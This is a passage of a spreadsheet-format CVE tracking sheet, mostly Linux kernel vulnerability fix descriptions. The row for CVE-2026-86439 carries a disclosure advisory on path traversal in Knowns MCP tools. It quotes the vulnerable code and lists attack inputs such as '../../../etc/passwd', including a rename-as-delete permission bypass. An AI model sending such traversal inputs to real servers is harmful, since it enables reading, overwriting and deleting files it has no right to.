        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr"/>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: hsr: free learned nodes on device setup failure
hsr_dev_finalize() can fail after a lower-device RX handler has
already been registered (slave A is added before the failable slave B
and interlink adds). RX handlers run in softirq regardless of the
master's state, so frames received in that window can learn dynamic
nodes into node_db, and the error unwind never releases them.
Free both owned dynamic databases in the unwind, mirroring
hsr_dellink(). proxy_node_db is provably empty on every current error
exit (only interlink RX feeds it, and the interlink add is the last
failable step) and is freed for symmetry. The order is safe:
hsr_del_port() unregisters each RX handler with synchronize_net()
before hsr_del_nodes() runs, which removes remaining entries with
list_del_rcu() and defers their release with call_rcu() for readers
already under RCU.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100071</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100072</t>
        </is>
      </c>
      <c r="D265" s="5" t="inlineStr"/>
      <c r="E265" s="5" t="inlineStr"/>
      <c r="F265" s="5" t="inlineStr"/>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr"/>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: platform: Use acpi_bus_get_primary_device()
The acpi_get_first_physical_node() usage in acpi_platform_fill_resource()
and acpi_create_platform_device() is generally unsafe because in theory
the device returned by it may be freed at any time [1].
It is also inefficient because acpi_get_first_physical_node() is called
multiple times for the same argument which can be avoided.
Address these issues by using acpi_bus_get_primary_device() instead of
acpi_get_first_physical_node() and adjusting the code to call it just
once at the beginning of and acpi_create_platform_device() and drop
the device reference acquired by it upon the return from that function.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100072</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100076</t>
        </is>
      </c>
      <c r="D266" s="5" t="inlineStr"/>
      <c r="E266" s="5" t="inlineStr"/>
      <c r="F266" s="5" t="inlineStr"/>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr"/>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix xmit_frame/xmit_buf leaks on mgnt-frame error paths
issue_beacon(), issue_probersp() and issue_asocrsp() obtain a management
xmit_frame together with its xmit_buf from the driver's fixed-size
management-TX pools via alloc_mgtxmitframe(). On the normal path the frame
is handed to dump_mgntframe(), which transfers ownership and eventually
returns both objects to their pools (the frame and, for beacons, the buf
in rtl8723bs_mgnt_xmit(); other bufs via the pending-xmitbuf/TX-completion
path).
Several error/edge paths return early after a successful
alloc_mgtxmitframe() but before dump_mgntframe(), so ownership is never
transferred and neither object is freed:
  - issue_beacon(): beacon larger than 512 bytes
  - issue_probersp(): cur_network-&gt;ie_length &gt; MAX_IE_SZ
  - issue_probersp(): kzalloc() of the SSID scratch buffer fails
  - issue_asocrsp(): pkt_type is neither ASSOCRSP nor REASSOCRSP
Because alloc_mgtxmitframe() removes the frame and buf from their free
lists (list_del_init) without placing them on any pending list, an
orphaned pair is on no list and referenced by nobody, so it is only
reclaimed at driver teardown. Repeated hits progressively exhaust the
management-TX pools until alloc_mgtxmitframe() returns NULL and the
interface can no longer send beacons or probe/assoc responses.
Free the frame and buffer on these paths, matching the existing correct
error handling in issue_assocreq().</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100076</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86439</t>
        </is>
      </c>
      <c r="D267" s="5" t="inlineStr"/>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr">
        <is>
          <t>npm:knowns</t>
        </is>
      </c>
      <c r="M267" s="5" t="inlineStr">
        <is>
          <t>0.30.0</t>
        </is>
      </c>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr"/>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>## Overview
Verified. Multiple **Unrestricted Path Traversal** vulnerabilities exist in the Knowns MCP `docs` and `memory` tools, allowing arbitrary file read, write, and deletion operations outside the project sandbox. The storage layer functions (`Get`, `Create`, `Update`, `Rename`, `Delete`) in both `doc_store.go` and `memory_store.go` concatenate user-controlled paths with `filepath.Join()` without any containment validation. 
Additionally, the `docs.update` action with a `newPath` parameter performs a file deletion via `Rename()`, but is classified as `CapWrite` in the permission registry rather than `CapDelete`. This allows an attacker with a `read-write-no-delete` preset to bypass deletion restrictions and destroy arbitrary files outside the project root.
## Affected paths
| File Path | Role | Vulnerability &amp; Execution Impact |
| :--- | :--- | :--- |
| **`internal/storage/doc_store.go`** | Vulnerable Sink (Docs) | **Path Traversal in File Operations (CWE-22):** `Get()`, `Create()`, `Update()`, `Rename()`, `Delete()` join user-controlled `path` with `filepath.Join(ds.docsDir(), ...)` without validating path containment. |
| **`internal/storage/memory_store.go`** | Vulnerable Sink (Memory) | **Path Traversal in Memory Operations (CWE-22):** `GetInLayer()`, `Create()`, `Update()`, `Delete()` join user-controlled `id` with `filepath.Join(dir, models.MemoryFileName(id))` without validation. |
| **`internal/mcp/handlers/doc.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `path`, `folder`, `newPath` directly to storage layer without sanitization. |
| **`internal/mcp/handlers/memory.go`** | Pass-Through Handler | **Unsanitized Input Propagation:** MCP handlers pass user-supplied `id` directly to storage layer without sanitization. |
| **`internal/permissions/registry.go`** | Authorization Bypass | **Capability Misclassification (CWE-863):** `docs.update` with `newPath` performs file deletion but is classified as `CapWrite`, bypassing `CapDelete` restrictions. |
## Root Cause
### Missing Path Containment in DocStore
In `internal/storage/doc_store.go`, all file operations use `filepath.Join()` to construct absolute paths without validating that the resolved path remains within `docsDir()`:
```go
// Get retrieves a doc by its relative path (without .md extension).
func (ds *DocStore) Get(path string) (*models.Doc, error) {
    path = strings.TrimPrefix(path, "/")
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    if _, err := os.Stat(absPath); err == nil {
        // ...
        return ds.parseFile(absPath, path, folder, false, "")
    }
    // ...
}
// Create writes a new doc to .knowns/docs/{path}.md.
func (ds *DocStore) Create(doc *models.Doc) error {
    if doc.Path == "" {
        return fmt.Errorf("doc path is required")
    }
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md")
    if err := os.MkdirAll(filepath.Dir(absPath), 0755); err != nil {
        return fmt.Errorf("create doc dir: %w", err)
    }
    return ds.writeFile(absPath, doc)
}
// Rename rewrites a doc to a new path and removes the old file.
func (ds *DocStore) Rename(oldPath string, doc *models.Doc) error {
    // ...
    oldAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(oldPath, ".md"))+".md")
    newAbsPath := filepath.Join(ds.docsDir(), filepath.FromSlash(strings.TrimSuffix(doc.Path, ".md"))+".md")
    // ...
    if err := ds.writeFile(newAbsPath, doc); err != nil {
        return err
    }
    if oldAbsPath != newAbsPath {
        // VULNERABLE: Deletes file at oldAbsPath (can be outside docsDir)
        if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
            return err
        }
    }
    return nil
}
// Delete removes a doc file.
func (ds *DocStore) Delete(path string) error {
    path = strings.TrimSuffix(path, ".md")
    // VULNERABLE: No containment check
    absPath := filepath.Join(ds.docsDir(), filepath.FromSlash(path)+".md")
    return os.Remove(absPath)
}
```
**Critical Flaws:**
- `filepath.Join` resolves `../` sequences natively
- No post-Join prefix check (e.g., `strings.HasPrefix(absPath, ds.docsDir())`)
- No rejection of absolute paths or path traversal sequences
- `Rename()` performs file deletion via `os.Remove(oldAbsPath)`, which can target files outside the docs directory
### Missing Path Containment in MemoryStore
In `internal/storage/memory_store.go`, memory operations similarly lack path validation:
```go
// GetInLayer retrieves a memory entry by ID from a specific layer only.
func (ms *MemoryStore) GetInLayer(id, layer string) (*models.MemoryEntry, error) {
    // ...
    dir, err := ms.dirForLayer(layer)
    if err != nil {
        return nil, err
    }
    // VULNERABLE: No containment check for id containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(id))
    if _, err := os.Stat(absPath); err != nil {
        return nil, fmt.Errorf("memory %q not found in %s layer", id, layer)
    }
    return ms.parseFile(absPath, layer)
}
// Create writes a new memory entry to the appropriate layer directory.
func (ms *MemoryStore) Create(entry *models.MemoryEntry) error {
    // ...
    dir, err := ms.dirForLayer(entry.Layer)
    if err != nil {
        return err
    }
    if err := os.MkdirAll(dir, 0755); err != nil {
        return fmt.Errorf("create memory dir: %w", err)
    }
    // VULNERABLE: No containment check for entry.ID containing "../"
    absPath := filepath.Join(dir, models.MemoryFileName(entry.ID))
    return atomicWrite(absPath, []byte(renderMemory(entry)))
}
// Delete removes a memory entry by ID.
func (ms *MemoryStore) Delete(id string) error {
    // ...
    filename := models.MemoryFileName(id)
    dirs := []string{ms.projectDir(), ms.globalDir()}
    for _, dir := range dirs {
        // VULNERABLE: No containment check
        absPath := filepath.Join(dir, filename)
        if _, err := os.Stat(absPath); err == nil {
            return os.Remove(absPath)
        }
    }
    return fmt.Errorf("memory %q not found", id)
}
```
### Authorization Bypass via Rename-as-Delete
In `internal/mcp/handlers/doc.go`, the `handleDocUpdate()` function accepts a `newPath` parameter that triggers a rename operation:
```go
func handleDocUpdate(getStore func() *storage.Store, req mcp.CallToolRequest) (*mcp.CallToolResult, error) {
    // ...
    if v, ok := stringArg(args, "newPath"); ok &amp;&amp; strings.TrimSpace(v) != "" {
        doc.Path = strings.Trim(strings.TrimSuffix(v, ".md"), "/")
    }
    // ...
    if oldPath != doc.Path {
        if err := store.Docs.Rename(oldPath, doc); err != nil {
            return errFailed("rename doc", err)
        }
        // ...
    }
    // ...
}
```
The `Rename()` function in `doc_store.go` performs file deletion:
```go
if oldAbsPath != newAbsPath {
    if err := os.Remove(oldAbsPath); err != nil &amp;&amp; !os.IsNotExist(err) {
        return err
    }
}
```
However, in `internal/permissions/registry.go`, `docs.update` is classified as `CapWrite`:
```go
"docs.update":  {Capability: CapWrite, Target: TargetDoc, Risk: RiskMedium},
```
This allows an attacker with a `read-write-no-delete` preset (which permits `CapWrite` but denies `CapDelete`) to delete files by using `docs.update` with a `newPath` parameter.
## Attack Vector
| Phase | Request / Action | Effect |
| :--- | :--- | :--- |
| **1. Arbitrary File Read** | `docs.get` with `path="../../../victim/secret"` | Server reads file outside project root via path traversal in `DocStore.Get()`. |
| **2. Arbitrary File Write** | `docs.create` with `folder="../../../victim"` | Server writes file outside project root via path traversal in `DocStore.Create()`. |
| **3. Arbitrary File Delete** | `docs.update` with `path="../outside/secret.md"` and `newPath="../../../victim/renamed.md"` | Server deletes file outside project root via path traversal in `DocStore.Rename()`. Bypasses `CapDelete` restriction because `docs.update` is classified as `CapWrite`. |
| **4. Memory File Read/Write** | `memory.update` with `id="x/../../../../victim/secret"` | Server reads and overwrites file outside project root via path traversal in `MemoryStore.Update()`. |
## Analysis
### Classic Path Traversal Pattern
Both `DocStore` and `MemoryStore` follow the same vulnerable pattern: user-controlled input is concatenated with a base directory using `filepath.Join()`, then passed directly to file system operations (`os.ReadFile`, `os.WriteFile`, `os.Remove`, `os.Stat`) without any validation.
```go
absPath := filepath.Join(baseDir, filepath.FromSlash(userInput))
// No containment check: strings.HasPrefix(absPath, baseDir)
// No rejection of ".." or absolute paths
```
`filepath.Join` resolves `../` sequences, allowing attackers to escape the intended directory:
- Input: `"../../../etc/passwd"`
- Result: `/project/.knowns/docs/../../../etc/passwd` → `/etc/passwd`
### Rename-as-Delete Authorization Bypass
The `Rename()` function performs two operations:
1. Write the file to the new location (`newAbsPath`)
2. Delete the file from the old location (`oldAbsPath`)
Both paths are vulnerable to traversal. An attacker can:
- Set `path` to a file outside the project (e.g., `"../../../victim/target.md"`)
- Set `newPath` to another location outside the project
- The `Rename()` function will delete the file at `path` (outside the project)
Because `docs.update` is classified as `CapWrite` rather than `CapDelete`, this operation bypasses deletion restrictions in `read-write-no-delete` presets.
### Compounding Factor - Unauthenticated Access
Due to the previously identified **Auth Bypass** vulnerability, all MCP tools are accessible without credentials when the server is started without a password, making this a zero-credential attack.
## Fix
*Patch is available right now at [New Release](https://github.com/knowns-dev/knowns/releases).*</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86439</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88389</t>
        </is>
      </c>
      <c r="D268" s="5" t="inlineStr"/>
      <c r="E268" s="5" t="inlineStr"/>
      <c r="F268" s="5" t="inlineStr"/>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr"/>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>Espruino 2v29 (commit bffc6d0) contains a NULL pointer dereference vulnerability in jslGetRawString() in src/jslex.c. Crafted raw/binary string input can cause the lexer to pass a NULL iterator target to jsvLockAgain(). In RELEASE/NO_ASSERT builds, the missing assertion guard allows a write through the NULL pointer, resulting in memory corruption and application termination or denial of service.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88389</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97530</t>
        </is>
      </c>
      <c r="D269" s="5" t="inlineStr"/>
      <c r="E269" s="5" t="inlineStr"/>
      <c r="F269" s="5" t="inlineStr"/>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr"/>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix soft lockup polling continuation IOCB signature
qla27xx_copy_multiple_pkt() and qla27xx_copy_fpin_pkt() poll
rsp_q-&gt;ring_ptr-&gt;signature for RESPONSE_PROCESSED (0xDEADDEAD) to decide
whether the next continuation IOCB has arrived, spinning on cpu_relax()
without advancing the ring or decrementing the entry count while it has
not. response_t::signature lives at byte offset 60, but a continuation
IOCB (sts_cont_entry_t / struct sts_cont_entry_ext) carries raw FC frame
payload at that offset (data[56..59]). A received frame whose payload
bytes happen to equal 0xDEADDEAD is therefore misread as "not yet
arrived", and the loop spins forever in interrupt/DPC context, causing a
CPU soft lockup.
The poll is also unnecessary: callers of qla27xx_copy_multiple_pkt()
(PT_LS4_UNSOL and the NVMe purls path) already gate on
qla_chk_cont_iocb_avail(), which guarantees all entry_count IOCBs are
present before copying begins. The sibling helper
__qla_copy_purex_to_buffer() already drops the signature poll and relies
on the entry_type == STATUS_CONT_TYPE guard instead.
Remove the signature busy-wait from both helpers, keeping the entry_type
guard, and gate the FPIN path with qla_chk_cont_iocb_avail() so it defers
and re-processes on the next interrupt once all continuation IOCBs have
arrived, mirroring the ELS_AUTH_ELS and PT_LS4_UNSOL arms. With this the
signature field is never read on a continuation IOCB, eliminating the
payload-aliasing lockup.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97530</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97534</t>
        </is>
      </c>
      <c r="D270" s="5" t="inlineStr"/>
      <c r="E270" s="5" t="inlineStr"/>
      <c r="F270" s="5" t="inlineStr"/>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr"/>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: accurately adjust free_sections during free_segment_range
In free_segment_range(), MAIN_SECS(sbi) is temporarily reduced by `secs`
to restrict block allocation to the safe remaining main area while valid
blocks in the truncated range are evacuated by GC.
However, FREE_I(sbi)-&gt;free_sections tracks the total number of free
sections across the whole filesystem. If any sections within the
truncated range were already free upon entering free_segment_range(),
failing to deduct them from free_sections causes the filesystem to
overestimate available free sections in the active, reduced main area.
This leads to inconsistent free section accounting during GC data
migration and can trigger unexpected allocation failures or assertion
errors when space is tight.
Fix this by calculating the number of already-free sections in the
truncated range, deducting them from free_sections upon entering
free_segment_range(), and restoring them on exit.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97534</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97546</t>
        </is>
      </c>
      <c r="D271" s="5" t="inlineStr"/>
      <c r="E271" s="5" t="inlineStr"/>
      <c r="F271" s="5" t="inlineStr"/>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr"/>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: don't spin forever on zero-length dirents when salvaging them
LOLLM noticed that xrep_dir_recover_data can spin forever if it
encounters an unused dirent that claims to have length zero.  Fix that,
and prevent the same thing from happening with a zero-length entry.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97546</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97547</t>
        </is>
      </c>
      <c r="D272" s="5" t="inlineStr"/>
      <c r="E272" s="5" t="inlineStr"/>
      <c r="F272" s="5" t="inlineStr"/>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr"/>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix exchange-range reflink flag clearing issue with INO1_WRITTEN
When exchanging two full-file ranges, xmi_can_exchange_reflink_flags()
can move the reflink inode flag from the file that currently has it to
the other file, as long as exactly one side is marked.  This assumes
that the file contents, and therefore all shared extents, are exchanged.
That assumption is not true when XFS_EXCHMAPS_INO1_WRITTEN is set.
xfs_exchmaps_can_skip_mapping() can skip hole and unwritten mappings
from file1, so an exchange can complete without moving every mapping
that the earlier flag-swap decision accounted for.  In that case the
post-operation cleanup can clear the reflink flag from an inode that
still owns shared written extents.  Later writes then take the
non-reflink write path and may update blocks that should still have
been protected by CoW, which shows up as data corruption between
reflink-related files.
Fix this by disabling the reflink flag exchange whenever
XFS_EXCHMAPS_INO1_WRITTEN is requested.  The contents exchange can still
proceed; the conservative outcome is that both inodes keep the reflink
flag.  The regular reflink flag cleanup path can drop the extra flag
later once the inode no longer has shared extents.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97547</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97549</t>
        </is>
      </c>
      <c r="D273" s="5" t="inlineStr"/>
      <c r="E273" s="5" t="inlineStr"/>
      <c r="F273" s="5" t="inlineStr"/>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr"/>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix under-reservation of blocks when repairing sf directories
Whilst running QA on XFS for-next as of 7.3-rc2 with MKFS_OPTIONS="-n
size=8192", I observed the following (trimmed) dmesg splat:
 XFS: Assertion failed: args-&gt;total &gt;= dp-&gt;i_nblocks - nblks, file: fs/xfs/libxfs/xfs_da_btree.c, line: 2387
 WARNING: fs/xfs/xfs_message.c:104 at assfail+0x46/0x4a [xfs], CPU#0: xfs_scrub/1426511
 CPU: 0 UID: 0 PID: 1426511 Comm: xfs_scrub Tainted: G        W           7.3.0-rc2-djwx #rc2 PREEMPT(lazy)  6e418570b606a39783b0e7e7b30dc407b965f9e8
 Tainted: [W]=WARN
 RIP: 0010:assfail+0x46/0x4a [xfs]
 RSP: 0018:ffffc900010d7890 EFLAGS: 00010246
 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00000000ffffffd1
 RDX: 0000000000000000 RSI: 0000000000000021 RDI: ffffffffa059fd38
 RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
 R10: 000000000000000a R11: 000000007fffffff R12: ffffc900010d7940
 R13: ffff888368d8f980 R14: ffffc900010d7a48 R15: ffffc900010d78d0
 FS:  00007f445c5ce680(0000) GS:ffff8884a97ea000(0000) knlGS:0000000000000000
 CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 CR2: 00007f443803b9a8 CR3: 0000000107a4b000 CR4: 00000000003506f0
 Call Trace:
  &lt;TASK&gt;
  xfs_da_grow_inode_int+0x2e0/0x300 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_dir2_grow_inode+0x6e/0x150 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_dir2_sf_to_block+0x149/0x870 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_dir_swap_prep+0xe2/0x110 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_dir_swap+0xfb/0x2f0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
